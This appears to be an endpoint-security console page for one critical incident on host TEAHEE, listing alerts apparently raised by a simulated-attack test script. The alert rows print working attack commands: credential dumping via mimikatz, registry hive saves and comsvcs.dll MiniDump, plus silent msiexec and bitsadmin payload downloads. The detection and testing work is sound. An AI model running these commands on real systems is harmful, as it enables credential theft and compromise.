Back to list

Incident Overview

Incident ID CINC-20251221-A2E2401D
Severity Critical (90)
Status new
Alert Count 15
Host Count 1

Timeline

First Seen 2025-12-21 23:52:50
Last Seen 2025-12-21 23:54:46
Duration 0d 0h 1m
Created 2025-12-22 00:41
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Persistence Execution Credential Access Defense Evasion
Techniques:
Event Triggered Execution User Execution OS Credential Dumping BITS Jobs Rundll32

Affected Hosts (1)

TEAHEE

Related Alerts (15)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:54
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:54
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:53
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-21 23:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-21 23:53
Critical new TEAHEE A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv 12-21 23:53
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:53
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:53
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-21 23:53
High new TEAHEE A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/test C:\Users\dokji\AppData\Local\Temp\bits.exe 12-21 23:53
High new TEAHEE A process appears to be launching mimikatz, a password dumping utility. mimikatz's primary purpose is to steal passwords. If credentials were dumped, change your passwords and investigate further. Credential Access C:\WINDOWS\system32\cmd.exe /c "powershell -c "sekurlsa::logonpasswords"" 12-21 23:53
Critical new TEAHEE A process appears to be accessing credentials and might be dumping passwords. If this is unexpected, review the process tree. Credential Access rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-21 23:53
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full 12-21 23:53
High new TEAHEE Rundll32 launched with unusual arguments. This occasionally results from applications misusing rundll32, but it might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Review the command line and the process tree. Defense Evasion C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" 12-21 23:53
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-21 23:52